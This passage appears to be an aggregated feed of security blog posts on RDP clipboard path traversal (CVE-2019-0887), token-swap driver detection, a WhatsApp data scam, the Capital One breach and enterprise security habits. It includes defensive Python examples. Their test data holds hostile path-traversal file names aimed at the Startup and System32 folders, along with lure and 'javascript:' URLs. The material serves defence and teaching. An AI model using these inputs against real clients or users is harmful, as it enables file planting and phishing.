To invest in good, reliable cybersecurity personnel, enterprises must identify certain cultural traits and hire along those lines. Candidates must be inquisitive, with a knack for problem-solving and for digging into problems to understand them. They should handle pressure well and always have a back-up plan. Most importantly, they must have a security mindset: understanding why cybersecurity matters and exhibiting cyber-secure behaviour in their own actions.

Invest in certifications

The best way to keep up with changing cybersecurity trends is to ensure personnel take certification courses which help them stay updated. Many organizations offer such certifications as a part of their Learning & Development calendar. To develop skill sets in the IT security domain for partner workforces, Seqrite also offers certification courses like Seqrite Certified Endpoint Security Professional and Seqrite Certified UM Professional, enabling professionals to demonstrate product features, configure security policies and deploy products in standard environments.

Develop and maintain strategic objectives

Ultimately, considering the criticality of cybersecurity for an enterprise, it is extremely important for it to begin at the board level of an organization. Enterprises must have clearly-defined strategies and policies on cybersecurity, outlining their protection mechanisms, what they are trying to achieve and how they execute plans.

This will ensure that enterprise cybersecurity has a roadmap and is not being dealt with in a casual manner, be it managing the talent gap or absorption of new cybersecurity talent. It is also important for enterprises to maintain cybersecurity programs within the organization and encourage upskilling.

By keeping these pointers in mind, enterprises can keep pace with the growing cybersecurity challenge by opening a constant channel of highly skilled cybersecurity professionals and cyber-secure the enterprise.

The post How should enterprises fill the rising talent gap in cybersecurity? appeared first on Seqrite Blog.

A case study in industry collaboration: Poisoned RDP vulnerability disclosure and response

Earlier this year, I reached out to Check Point researcher Eyal Itkin, who had published research on multiple flaws in several Remote Desktop Protocol (RDP) clients, including a vulnerability in mstsc.exe, the built-in RDP client application in Windows. While no active exploits had been detected in the wild, it was important for me and my team at Microsoft to analyze the vulnerability, do further variant analysis and investigation, and build defenses, including cloud-based post-breach detection in addition to the operating system fix.

The cross-company collaboration that followed was especially critical in this case, because the attack technique is quite tricky to detect. The vulnerability exists in the shared clipboard mechanism. Unlike other RDP vulnerabilities that could allow an attacker to connect to target machines using the RDP protocol, in this case, an attacker would wait for a user to connect to a compromised machine, and then start the attack through the vulnerability. RDP anomaly detection wouldn’t be useful, because exploit behavior doesn’t stand out as unusual.

The vulnerability, called Poisoned RDP vulnerability and designated as CVE-2019-0887, has been fixed, but it serves as a good case study for industry collaboration leading to better and speedier response to security issues. In this blog, we’ll share an overview of the vulnerability and how we worked with Check Point to build the defenses using Windows telemetry.

Path traversal vulnerability in shared clipboard

A typical RDP scenario is connecting an RDP client to an RDP server installed on a remote computer. After successfully connecting, the client gains access to the remote server. Depending on the user’s permissions, the client can then control the server. What happens if it’s the other way around, where a remote server can attack and gain control of a client?

In his research into reverse RDP attacks, Eyal Itkin found that for mstsc.exe this technique, also referred to as lazy lateral movement, was possible through the clipboard sharing channel. The shared clipboard lets a user copy a group of files on one computer and paste them on the other. If the client fails to properly canonicalize and sanitize the file paths it receives, it is vulnerable to a path traversal attack, allowing a malicious RDP server to drop arbitrary files in arbitrary paths on the client machine.
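To make the client-side check concrete, here is an added Python example written for this page; it is not code from mstsc.exe, from Microsoft or from Check Point. It uses Python’s `ntpath` so that it reasons about Windows paths on any OS. The paste destination, the server-supplied file names and the function names are constructed assumptions; the unsafe variant shows where a server-supplied name actually lands, the safe variant canonicalizes first and refuses anything that would escape the destination folder.

```python
import ntpath

# Constructed sample values (assumptions, not from the advisory): where the user
# pastes, and two file names a malicious RDP server might put in the clipboard
# file list for the client to write out.
DESKTOP = r"C:\Users\bob\Desktop"
TRAVERSAL_NAME = (r"..\AppData\Roaming\Microsoft\Windows\Start Menu"
                  r"\Programs\Startup\evil.exe")
ABSOLUTE_NAME = r"C:\Windows\System32\evil.dll"


def vulnerable_paste_target(dest_dir: str, server_file_name: str) -> str:
    """The unsafe pattern: trust the server-supplied name and join it under the
    paste destination. ntpath.normpath shows where the write actually lands
    once '..' segments are resolved (an absolute name replaces dest_dir
    entirely)."""
    return ntpath.normpath(ntpath.join(dest_dir, server_file_name))


def safe_paste_target(dest_dir: str, server_file_name: str):
    """Canonicalize and confine: return the path to write, or None if the
    server-supplied name would land anywhere other than inside dest_dir."""
    if (ntpath.isabs(server_file_name)                # C:\..., \\server\share\...
            or server_file_name[:1] in ("\\", "/")    # rooted name such as \foo
            or ":" in server_file_name):              # drive-relative C:foo or NTFS stream
        return None
    dest = ntpath.normcase(ntpath.normpath(dest_dir))
    candidate = ntpath.normpath(ntpath.join(dest_dir, server_file_name))
    # Case-insensitive comparison; the candidate must sit strictly *below* dest
    # (dest plus a separator), so 'Desktop' cannot match 'DesktopEvil', and a
    # name of '.' or '..' is rejected because it resolves to dest or above it.
    if not ntpath.normcase(candidate).startswith(dest + ntpath.sep):
        return None
    return candidate


if __name__ == "__main__":
    for name in ("report.docx", TRAVERSAL_NAME, ABSOLUTE_NAME):
        print(f"{name!r}\n  naive -> {vulnerable_paste_target(DESKTOP, name)}"
              f"\n  safe  -> {safe_paste_target(DESKTOP, name)}")
```

The traversal name resolves to the per-user Startup folder, which is exactly why the detection work later in the post watches that folder: a file dropped there runs at the next logon without any further action by the attacker.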

Figure 1. Architecture of clipboard sharing in Microsoft RDP (source: Reverse RDP Attack: Code Execution on RDP Clients)

Moreover, every time a clipboard is updated on either side of the RDP connection, a message is sent to the other side to notify it about the new clipboard formats that are now available. This means that a malicious server is notified whenever the client copies something to the clipboard, which the server can then query and read.

The server can also notify the client about a fake clipboard update without any actual copy operation inside the RDP window, thus completely controlling the client’s clipboard without the user noticing.

Eyal also found that, because Hyper-V uses RDP, it inherits the security vulnerabilities in RDP. Hyper-V uses RDP behind the scenes for managing the VM, meaning that the vulnerability could be used to escape a Hyper-V VM, resulting in a guest-to-host sandbox escape vulnerability.

Cloud-based post-breach detection

While we worked on fixing the vulnerability, it was important for us to develop a post-breach detection in order to protect customers from attacks that might exploit the vulnerability. For this effort, we worked closely with Eyal, whose cooperation was critical to the development of these solutions.

Given the details of the vulnerability, we worked under the following conditions:

  • To be effective, the detections would need to use existing optics available to all Windows 10 versions.
  • The detection logic should spot the threat from the machine where the RDP client (the one that initiates the RDP connection) is installed. We should be able to detect files transferred from the compromised machine, where the RDP server is installed, to the client machine. This means we must rely solely on telemetry generated on the client machine.
  • RDP anomaly detection is not useful in this scenario. Since the RDP connection is initiated by the client machine—more specifically, by the user—we don’t expect an abnormal connection to occur.

For this purpose, Event Tracing for Windows (ETW), a built-in Windows 10 feature, provides the kernel-level tracing that’s useful in detecting this threat. Using ETW events, specifically RDP connection events (provider: Microsoft-Windows-RemoteDesktopServices-RdpCoreTS) and clipboard events (provider: Microsoft.Windows.OLE.Clipboard), as well as file creation events, we created a detection logic that:

  1. Observes RDP session events
  2. Observes multiple files being pasted within a short period of time
  3. Correlates file creation and pasting timestamps
  4. Raises an alert if the correlated files are in different directories

These detections are added to the Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) endpoint detection and response. These detections raise an alert in Microsoft Defender Security Center, which security operations personnel can then use to investigate attacks.

In addition, given that this is a new attack scenario, we explored additional detection logic that is as general as possible to help counter corner cases and account for tweaks to the attack scenario. These detections would cover the end-to-end attack, focusing on behaviors pertinent to the attack scenario:

  • Monitoring the Startup folder. This includes anomaly detection for file creation events under the Startup folder using multiple features like file signature, creation process, etc. In addition, files created in the Startup folder can be verified using scanning capabilities.
  • Identifying anomalous file pasting from the clipboard. Machine learning-based detections can recognize files that are pasted in different locations within a short period of time. The anomaly features can be the number of pasted files or file directories.
  • Detecting file creation anomalies. Machine-learning based detections can recognize anomalies in file creation paths. The anomaly features can be file path, creation time, and file name. Note: This detection covers a broad scenario, regardless of method.
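The four correlation steps above, plus the Startup-folder check from the first of the broader detections, as an added toy implementation in Python written for this page; it is not Microsoft’s detection code. It runs over a constructed, simplified event stream standing in for the ETW providers the post names: the `Event` shape, the file-creation provider name, the time windows and every sample path are assumptions, and real ETW payloads look different.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
import ntpath

# The RDP and clipboard provider names are the ones the post cites; the
# file-creation provider is an assumption (any file-create telemetry will do).
RDP_PROVIDER = "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS"
CLIPBOARD_PROVIDER = "Microsoft.Windows.OLE.Clipboard"
FILE_PROVIDER = "Microsoft-Windows-Kernel-File"
STARTUP_MARKER = ntpath.normcase(r"\Microsoft\Windows\Start Menu\Programs\Startup")


@dataclass
class Event:
    ts: datetime
    provider: str
    kind: str          # "SessionStart", "SessionEnd", "Paste", "FileCreate"
    path: str = ""     # only meaningful for FileCreate


def rdp_session_intervals(events):
    """Step 1: pair RDP SessionStart/SessionEnd events into (start, end) tuples;
    a session still open at the end of the stream gets datetime.max."""
    intervals, start = [], None
    for e in sorted(events, key=lambda e: e.ts):
        if e.provider != RDP_PROVIDER:
            continue
        if e.kind == "SessionStart":
            start = e.ts
        elif e.kind == "SessionEnd" and start is not None:
            intervals.append((start, e.ts))
            start = None
    if start is not None:
        intervals.append((start, datetime.max))
    return intervals


def pasted_file_creations(events, paste_window=2.0):
    """Steps 2-3: FileCreate events that occur during an RDP session and within
    paste_window seconds after a clipboard Paste event."""
    intervals = rdp_session_intervals(events)
    pastes = [e.ts for e in events
              if e.provider == CLIPBOARD_PROVIDER and e.kind == "Paste"]
    window = timedelta(seconds=paste_window)
    return [e for e in sorted(events, key=lambda e: e.ts)
            if e.kind == "FileCreate"
            and any(a <= e.ts <= b for a, b in intervals)
            and any(p <= e.ts <= p + window for p in pastes)]


def detect_poisoned_rdp(events, paste_window=2.0, burst_window=5.0):
    """Step 4: group pasted creations into bursts (files created within
    burst_window seconds of the first one) and alert when a single burst
    writes into more than one directory. Returns a list of alert dicts."""
    alerts, bursts, burst = [], [], []
    for e in pasted_file_creations(events, paste_window):
        if burst and e.ts - burst[0].ts > timedelta(seconds=burst_window):
            bursts.append(burst)
            burst = []
        burst.append(e)
    if burst:
        bursts.append(burst)
    for b in bursts:
        dirs = {ntpath.normcase(ntpath.dirname(e.path)) for e in b}
        if len(b) >= 2 and len(dirs) > 1:
            alerts.append({
                "first_seen": b[0].ts,
                "files": [e.path for e in b],
                "directories": sorted(dirs),
                # Startup-folder heuristic from the broader detections.
                "touches_startup": any(STARTUP_MARKER in d for d in dirs),
            })
    return alerts


# Constructed sample stream (not real telemetry): one RDP session, a benign
# two-file paste onto the Desktop, an unrelated download, then a paste whose
# second file lands in the Startup folder via the path traversal.
T0 = datetime(2019, 7, 9, 10, 0, 0)
DESKTOP = r"C:\Users\bob\Desktop"
STARTUP = r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"


def _at(seconds):
    return T0 + timedelta(seconds=seconds)


SAMPLE_EVENTS = [
    Event(_at(-600), FILE_PROVIDER, "FileCreate", r"C:\Users\bob\Downloads\old.txt"),
    Event(_at(0), RDP_PROVIDER, "SessionStart"),
    Event(_at(300), CLIPBOARD_PROVIDER, "Paste"),
    Event(_at(300.3), FILE_PROVIDER, "FileCreate", DESKTOP + r"\report.docx"),
    Event(_at(300.4), FILE_PROVIDER, "FileCreate", DESKTOP + r"\photo.jpg"),
    Event(_at(360), FILE_PROVIDER, "FileCreate", r"C:\Users\bob\Downloads\setup.exe"),
    Event(_at(420), CLIPBOARD_PROVIDER, "Paste"),
    Event(_at(420.2), FILE_PROVIDER, "FileCreate", DESKTOP + r"\invoice.pdf"),
    Event(_at(420.3), FILE_PROVIDER, "FileCreate", STARTUP + r"\evil.exe"),
    Event(_at(900), RDP_PROVIDER, "SessionEnd"),
]

if __name__ == "__main__":
    for alert in detect_poisoned_rdp(SAMPLE_EVENTS):
        print(alert)
```

Run against the sample, the first paste produces no alert (two files, one directory), the download at 10:06 is ignored because no paste preceded it, and the second paste raises a single alert whose files span the Desktop and the Startup folder. The windows are the knobs a real deployment would tune: a tight paste window keeps unrelated file activity out, and the burst window has to be long enough to cover a multi-file paste on a slow link.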

Security update

Microsoft Security Response Center (MSRC) worked with Check Point to further investigate and address the vulnerability. The fix for CVE-2019-0887 was released as part of the July 2019 security update. We encourage customers to keep systems up-to-date.

Conclusion: Lessons from CVE-2019-0887

The responsible disclosure of CVE-2019-0887 by Check Point and the subsequent collaboration with Microsoft teaches us several lessons in security. From design perspective, there’s a lesson to be learned from how the clipboard, which was originally designed to be used locally, was applied in new environments.

Meanwhile, our research into post-breach defenses given the unique characteristics of this attack scenario highlighted the importance of Windows telemetry in detecting malicious behavior. ETW is a powerful defender tool that allows the creation of new detection mechanisms that don’t require an OS update.

Overall, this cross-company, cross-continent teamwork demonstrates the benefits of industry collaboration. We discovered a vulnerability, secured customers, and developed a fix, all while learning important lessons that we can share with the industry.

Eyal and I shared these lessons in our Black Hat USA 2019 session, “He Said, She Said – Poisoned RDP Offense and Defense”.

 

Dana Baril (@dana_baril)

Microsoft Defender ATP Research Team 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post A case study in industry collaboration: Poisoned RDP vulnerability disclosure and response appeared first on Microsoft Security.

Enterprises can begin securing their endpoints by following these five simple steps.


Sustainable enterprise security is both good practice and a core business process. Enterprises are increasingly aware of the diverse and intense nature of the threats in cyberspace and the damage they can cause; that’s where strong enterprise security solutions come in.

This is step one: enterprise security consists of ever-evolving, complex layers that are never static, so after every cycle the security mechanisms tend to get stronger. However, attackers are getting extremely savvy and sophisticated with their malware, timing attacks to penetrate endpoints during security transitions.

Here, then, are some easy-to-prevent flaws that creep in when enterprises try to secure their endpoints.

  1. Lack of proper enterprise security policies

Enterprise security policies cannot be ad hoc; they need to be in place from the beginning, because that is where strong enterprise security takes root. The best strategies are ineffective if they are not backed by strong security policies.

When it comes to enterprise security, organizations must be proactive in drafting policies. At their core these should cover employee dos and don’ts, workforce collaboration that supports cybersecurity, and human-resource initiatives on malware literacy, among other things, and they should be complied with and regularly updated so that business security is never at risk.

  2. Inability to prioritize security integration of mobiles into enterprise networks

Mobile phones as work devices are increasingly common in the enterprise. Employees who use them need to bring those devices under enterprise security controls so that business-critical data is not compromised. With rising attacks on mobile devices, Enterprise Mobility Management (EMM) has become a must for businesses of all sizes that allow this. Solutions like Seqrite mSuite let employees safely access productivity apps on BYOD (Bring Your Own Device) or CYOD (Choose Your Own Device) devices while maintaining strong security.

  3. Compliance with regulations

Most companies now operate under some sort of regulatory control over their data, for example HIPAA for private health information or FERPA for student records. Often this information is stored in the cloud; wherever it lives, leaking it can have serious consequences, so enterprises must be vigilant about compliance with respect to the nature of the data and its storage.

  4. Faulty access permission

Enterprises can build firewalls to military standards, but the framework collapses if appropriate access-control mechanisms are not in place. System administrators need to grant precise access to business users based on their role in the organization. This limits insider breaches and keeps sensitive information confidential. Otherwise, if attackers gain direct access to an employee’s system, they can move through the business with devastating effect.

  5. Not taking employees into confidence

Employees are the backbone of cybersecurity discipline. Enterprises should therefore bring employees along as they implement cybersecurity solutions. Employees must be made aware of the dangers of weak enterprise security, the steps they can take, and the warning signs to look for. Because cyber threats are highly dynamic and dangerous, untrained employees are very likely to become the internal agents and channels of a cyberattack.

After addressing these flaws internally, enterprises should invest in proven cybersecurity solutions such as Seqrite Endpoint Security (EPS), which offers a simple and comprehensive platform integrating several advanced technologies in one place for protection against advanced cyber threats.

EPS also comes packed with other vital features such as –

  • Web Filtering
  • Application Control
  • Vulnerability Scan
  • Patch Management
  • File Activity Monitor
  • IDS/IPS Protection

The post Enterprises can begin securing their endpoints by following these five simple steps. appeared first on Seqrite Blog.

Be Wary of WhatsApp Messages Offering 1000GB of Free Data

Global messaging giant WhatsApp turned 10 years old this year. It’s not unusual for companies to give loyal customers or members gifts to show their appreciation at such milestones. Unfortunately, cybercriminals are using this as a ploy to carry out their malicious schemes. According to Forbes, security researchers have discovered a fraudulent message promising users 1000GB of free internet data; it is a scam that brings in ad-click revenue for cybercriminals.

Let’s dive into the details of this suspicious message. The text reads “WhatsApp Offers 1000GB Free Internet!” and includes a link to click on for more details. However, the link provided doesn’t use an official WhatsApp domain. Many users might find this confusing since some businesses do run their promotions through third-party organizations. Forbes states that once a user clicks on the link, they are taken to a landing page that reads “We offer you 1000 GB free internet without Wi-Fi! On the occasion of our 10th anniversary of WhatsApp.” To make the user feel like they need to act fast, the landing page also displays a bright yellow countdown sticker warning that there are a limited number of awards left.

As of now, it doesn’t appear that the link spreads malware or scrapes users’ personal information. However, the scam could eventually evolve into a phishing tactic. Additionally, the more users click on the fraudulent link, the more the cybercriminals behind this scheme rack up bogus ad clicks. This ultimately brings in revenue for the cybercrooks, encouraging them to continue creating these types of scams. For example, the domain being used by the scammers behind the WhatsApp message also hosts other fake brand-led promotional offers for Adidas, Nestle, Rolex, and more.
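The first red flag above, a link whose host is not an official WhatsApp domain, is exactly the check that a naive substring test gets wrong. Here is an added Python example written for this page (not McAfee’s or Forbes’s code) that contrasts the naive test with a proper host check. The allowlist and every sample URL are constructed assumptions; none of them is the real scam domain.

```python
from urllib.parse import urlsplit

# Assumption: the registrable domain(s) an official WhatsApp promotion would use.
OFFICIAL_DOMAINS = ("whatsapp.com",)


def naive_contains_check(url: str) -> bool:
    """What people intuitively do: look for the brand name anywhere in the URL.
    Fooled by 'whatsapp.com.evil.example', by 'whatsapp.com@evil.example' and
    by 'evil.example/whatsapp.com'."""
    return "whatsapp.com" in url.lower()


def link_host(url: str):
    """Extract the host the browser would actually connect to, or None."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return None
    if parts.scheme.lower() not in ("http", "https"):
        return None          # javascript:, data:, etc. are not promo links
    host = parts.hostname    # already lowercased; userinfo and port stripped
    return host.rstrip(".") if host else None


def is_official_link(url: str, official=OFFICIAL_DOMAINS) -> bool:
    """True only if the host *is* an official domain or a subdomain of one.
    The label boundary ('.' + domain) matters: 'notwhatsapp.com' must fail."""
    host = link_host(url)
    if host is None or not host.isascii():
        return False         # non-ASCII host: possible homoglyph, reject outright
    return any(host == d or host.endswith("." + d) for d in official)


# Constructed sample links (assumptions): two genuine ones and the shapes a
# "1000GB free data" lure tends to take, with the verdict each should get.
SAMPLES = {
    "https://www.whatsapp.com/": True,
    "https://faq.whatsapp.com/general/": True,
    "https://whatsapp.com.free-1000gb.example/offer": False,
    "https://whatsapp.com@free-1000gb.example/": False,
    "http://free-1000gb.example/whatsapp.com/anniversary": False,
    "https://notwhatsapp.com/": False,
    "https://whats\u0430pp.com/": False,   # Cyrillic 'а' in place of Latin 'a'
    "javascript:alert(1)": False,
}


def classify_all(samples=SAMPLES):
    """Return {url: (naive_verdict, proper_verdict)} for a side-by-side view."""
    return {u: (naive_contains_check(u), is_official_link(u)) for u in samples}


if __name__ == "__main__":
    for url, (naive, proper) in classify_all().items():
        print(f"{'OK ' if proper else 'BAD'} naive={naive!s:5} {url}")
```

The naive test says yes to every lure that merely contains the brand name; the host check only passes the two genuine links. Note that the check answers “is this host official?” and nothing more: a compromised page on a genuine subdomain would still pass, which is why the advice to go to the official site yourself rather than follow the link still stands.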

So, what can users do to prevent falling for these phony ads? Check out the following tips to help you stay secure:

  • Avoid interacting with suspicious messages. Err on the side of caution and don’t respond to direct messages from a company that seems out of the ordinary. If you want to know if a company is participating in a promotional offer, it is best to go directly to their official site to get more information.
  • Be careful what you click on. If you receive a message in an unfamiliar language, one that contains typos, or one that makes claims that seem too good to be true, avoid clicking on any attached links.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help safeguard you from malware and warn you of phishing attempts so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Be Wary of WhatsApp Messages Offering 1000GB of Free Data appeared first on McAfee Blogs.

How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection

Detecting and stopping attacks that tamper with kernel-mode agents at the hypervisor level is a critical component of the unified endpoint protection platform in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP). It’s not without challenges, but the deep integration of Windows Defender Antivirus with hardware-based isolation capabilities allows the detection of artifacts of such attacks.

Recently, the Microsoft Defender ATP research team found a malicious system driver enabling a token swap attack that could lead to privilege escalation. In this blog, we’ll share our analysis of this attack and discuss how Windows Defender Antivirus uses its unique visibility into system behaviors to detect dangerous kernel threats.

Hardware-based root of trust

Windows Defender System Guard, a hardware-based system integrity capability in Microsoft Defender ATP, has a runtime measurement component called runtime attestation. This runtime measurement component includes a sub-engine called assertion engine (see Figure 1), which continuously measures and asserts the integrity of the Windows kernel, providing supplementary signals about any abnormal system behavior.

Figure 1. High-level Windows Defender System Guard runtime attestation architecture

Architecturally, the solution is collectively referred to as the Windows Defender System Guard runtime monitor and consists of the following client-side components:

  • The VTL-1 runtime assertion engine itself
  • A VTL-0 kernel-mode agent
  • A VTL-0 process we call the ‘broker’ to host the assertion engine

The goal is to detect artifacts of data corruption attacks and other threats that tamper with kernel-mode agents at the hypervisor level. Windows Defender Antivirus, the next-generation component of Microsoft Defender ATP, integrates with Windows Defender System Guard runtime attestation and consumes signals from the assertion engine.

Detecting token theft attacks

Every Windows process has a primary token that describes the security context of the user account associated with the process. The information in the token includes the identity and privileges of the user account associated with the process or thread. Token theft attacks are rampant because they can allow adversaries to use access tokens to operate using different user accounts or under different system security contexts to perform malicious actions and evade detection.

The Microsoft Defender ATP Research team recently uncovered and analyzed signals from Windows Defender System Guard assertion engine that indicated manipulation of a primary token, causing token swap – a distinctly suspicious activity, given that the aspects of a primary token are immutable once the process starts running.

Further analysis of Windows Defender Antivirus telemetry identified the malicious system driver responsible for the token swap attack. The sample containing the system driver was signed with a compromised certificate (thumbprint: 31e5380e1e0e1dd841f0c1741b38556b252e6231) that is commonly misused in the wild.

Figure 2. Revoked certificate used by malicious system driver

The driver exhibited the following rootkit behavior:

  • Token swap
  • Tampering with the EPROCESS structure in kernel mode and with the PEB to disguise the process as svchost.exe

In this scenario, Windows Defender System Guard raised an initial assertion failure signal for the token swap. Windows Defender Antivirus consumed the signal and applied intelligence to discover that the suspicious activity was being orchestrated by a system driver.

Figure 3. Decompiled malicious driver code for token theft

Using a Microsoft cloud service that keeps track of stolen or revoked PKI certificates worldwide, Windows Defender Antivirus confirmed that the driver was indeed signed with a revoked or stolen certificate, and that it was communicating with the infected binary to perform the token swap.

Windows Defender Antivirus works seamlessly with Microsoft cloud services, such as the one that flags binaries signed by stolen or revoked certificates. Signals like these enrich the protection delivered by multiple next-generation protection engines in Windows Defender Antivirus to provide near-instant, automated defense against new and emerging threats. With cloud-delivered protection, next-generation technologies provide rapid identification and blocking of attacks, typically even before a single machine is infected.

Device integrity for broader security

The goal of Windows System Guard runtime attestation is to provide its consumers with a trustworthy assessment of the security posture and integrity of devices. Apps and services can take advantage of this attestation technology to ensure that the system is free from tampering and that critical processes are running as expected. Runtime attestation can help in many scenarios, including:

  • Providing supplementary signals for endpoint detection and response (EDR) and antivirus vendors (including full integration with the Microsoft Defender ATP stack)
  • Detecting artifacts of kernel tampering, rootkits, and exploits
  • Protected game anti-cheat scenarios (for example, detection of process-protection bypasses that can lead to game-state modification)
  • Securing sensitive transactions (banking apps, trading platforms)
  • Conditional access (enabling and enhancing device security-based access policies)

The assertion engine can detect attacks that can reasonably be performed under the most restrictive attack conditions, such as when the system has already been hardened with hypervisor-protected code integrity (HVCI) and enforced kernel mode code integrity (KMCI).

This case study has shown how Microsoft Defender ATP, and hence the broader Microsoft Threat Protection, reaps significant security benefits from Windows Defender System Guard runtime attestation. We invite the industry to do the same.

To learn more, read our blog about Windows Defender System Guard runtime attestation.

 

 

Abhijat Singh, Enterprise & Security
David Kaplan (@depletionmode), Microsoft Defender ATP Research
Chun Feng, Microsoft Defender ATP Research
Hermineh Sanossian, Enterprise & Security

 

 



The post How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection appeared first on Microsoft Security.

Capital One Data Breach: How Impacted Users Can Stay More Secure

Capital One is one of the 10 largest banks based on U.S. deposits. As with many big-name brands, cybercriminals see these companies as an ideal target to carry out large-scale attacks, which has now become a reality for the financial organization. According to CNN, approximately 100 million Capital One users in the U.S. and 6 million in Canada have been affected by a data breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, 80,000 bank account numbers, and more.

According to the New York Post, the alleged hacker claimed the data was obtained through a firewall misconfiguration. This misconfiguration allowed command execution on a server that granted access to data in Capital One’s storage space at Amazon. Luckily, Capital One stated that it “immediately fixed the configuration vulnerability.”

This breach serves as a reminder that users and companies alike should do everything in their power to keep personal information protected. If you think you might have been affected by this breach, follow these tips to help you stay secure:

  • Check to see if you’ve been notified by Capital One. The bank will notify everyone who was affected by the breach and offer them free credit monitoring and identity protection services. Be sure to take advantage of the services and check out the website Capital One set up for information on this breach.
  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible. Capital One will allow you to freeze your card so purchases can no longer be made.
  • Change your credentials. Err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Capital One Data Breach: How Impacted Users Can Stay More Secure appeared first on McAfee Blogs.

What are some of the worst enterprise security habits?

Estimated reading time: 3 minutes

Enterprise security is a habit! Good habits take years to form – bad habits, on the other hand, take only seconds, and can bring years of hard work down in minutes. The same rule applies to enterprise security.

It’s just easier to put an easy password (or worse, no password) on an important function and leave it open to danger – or turn off the auto-updater of your security solution, consequently leading to disaster and danger.

Hence, here are ten of the worst enterprise security habits which organizations should get rid of immediately –

  1. Access to everything – Strangely, a lot of organizations, especially the legacy ones, allow everyone access to everything. The net result of this critical oversight is seriously weakened enterprise security, leaving the organization just one small slip-up away from a major disaster.
  2. No security policy – Most companies have policies for everything – HR policies, leave policies, dress policies, time policies, so it’s amusing that they don’t have something as intrinsic as a cyber security policy. Enterprises must keep a strong, updated cyber security policy with clear dos-and-don’ts about what measures need to be taken.
  3. Software update – The grim realization when the WannaCry ransomware attack hit the world and caused mayhem was that it could have easily been avoided. It exploited a security hole in Windows XP. Yes, that’s right – Windows XP, an operating system which is now almost two decades old and which Microsoft itself stopped supporting in 2014. In fact, it was found that 7% of PCs all across the world still use this outdated operating system. This example sums up the extreme danger of not updating the software a business uses.
  4. Underestimating social engineering – Many enterprises can slip into the notion that cyber security is purely a technological problem and that putting in place a strong cyber security solution can solve all problems. But that is not the case – social engineering is as big an issue as cyber security, nowadays. The only way to solve this is to ensure that employees are as well-versed in cyber security issues as experts.
  5. Forgetting to patch software – It’s fine to keep a strong cyber security focus, but enterprises can bring great harm on themselves if they don’t patch their software. Even the most secure software can become outdated extremely fast and may be at risk of attack. Enterprises must be proactive in patching software at regular, timely intervals.
  6. Believing we won’t be attacked – SMBs and SOHOs usually perceive that they won’t be prone to cyber-attacks as hackers will be typically interested in attacking larger corporations. But the truth is, smaller enterprises are at high risk of attacks as cyber criminals know about smaller businesses having weaker defenses, compared to relatively high-profile organizations.
  7. Not having a security response plan – This ties into the above point but is applicable for organizations at all scales. Complacency can often creep into enterprises which means that they believe that they are immune to cyber-attacks. This means they won’t even have a security response plan which can be catastrophic at the worst possible time – when an attack hits.
  8. Not having cyber security drills – It’s okay to have a security response plan but is it updated? Has it practically ever been used? Mock drills can help showcase an enterprise’s preparedness to cyber-attacks, while lack of these drills means that there might be chaos.
  9. Not investing in the right people – Cyber security hiring is increasingly becoming a specialized trend now, one which enterprises must wake up to. It’s important to have good skilled personnel to deal with the cyber security function and ensure that they keep on getting new certifications so they stay updated.
  10. No backup – Backup is integral in cyber security. Enterprises sometimes neglect backup which puts them in a precarious situation, whenever there is a cyber security attack. Don’t wait for that time – invest in good backup solutions and ensure that valuable data is backed up to prevent loss.

By getting rid of the above enterprise security habits and investing in a strong, secure cyber security solution (like Seqrite’s range of solutions), enterprises can go a long way in ensuring that their network security parameters are safe and secure.

The post What are some of the worst enterprise security habits? appeared first on Seqrite Blog.

New machine learning model sifts through the good to unearth the bad in evasive malware

We continuously harden machine learning protections against evasion and adversarial attacks. One of the latest innovations in our protection technology is the addition of a class of hardened malware detection machine learning models called monotonic models to Microsoft Defender ATP’s Antivirus.

Historically, detection evasion has followed a common pattern: attackers would build new versions of their malware and test them offline against antivirus solutions. They’d keep making adjustments until the malware could evade antivirus products. Attackers then carry out their campaign knowing that the malware won’t initially be blocked by AV solutions, which are then forced to catch up by adding detections for the malware. In the cybercriminal underground, antivirus evasion services are available to make this process easier for attackers.

Microsoft Defender ATP’s Antivirus has significantly advanced in becoming resistant to attacker tactics like this. A sizeable portion of the protection we deliver is powered by machine learning models hosted in the cloud. The cloud protection service breaks attackers’ ability to test and adapt to our defenses in an offline environment, because attackers must either forgo testing, or test against our defenses in the cloud, where we can observe them and react even before they begin.

Hardening our defenses against adversarial attacks doesn’t end there. In this blog we’ll discuss a new class of cloud-based ML models that further harden our protections against detection evasion.

Most machine learning models are trained on a mix of malicious and clean features. Attackers routinely try to throw these models off balance by stuffing clean features into malware.

Monotonic models are resistant against adversarial attacks because they are trained differently: they only look for malicious features. The magic is this: Attackers can’t evade a monotonic model by adding clean features. To evade a monotonic model, an attacker would have to remove malicious features.

Monotonic models explained

Last summer, researchers from UC Berkeley (Incer, Inigo, et al, “Adversarially robust malware detection using monotonic classification”, Proceedings of the Fourth ACM International Workshop on Security and Privacy Analytics, ACM, 2018) proposed applying a technique of adding monotonic constraints to malware detection machine learning models to make models robust against adversaries. Simply put, the said technique only allows the machine learning model to leverage malicious features when considering a file – it’s not allowed to use any clean features.

